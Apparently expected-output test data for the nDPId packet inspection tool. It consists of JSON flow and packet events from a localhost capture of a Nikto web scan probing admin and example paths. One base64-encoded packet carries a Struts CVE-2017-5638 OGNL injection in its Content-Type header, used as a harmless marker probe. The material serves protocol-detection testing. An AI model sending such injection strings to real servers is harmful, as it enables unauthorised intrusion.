{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="} 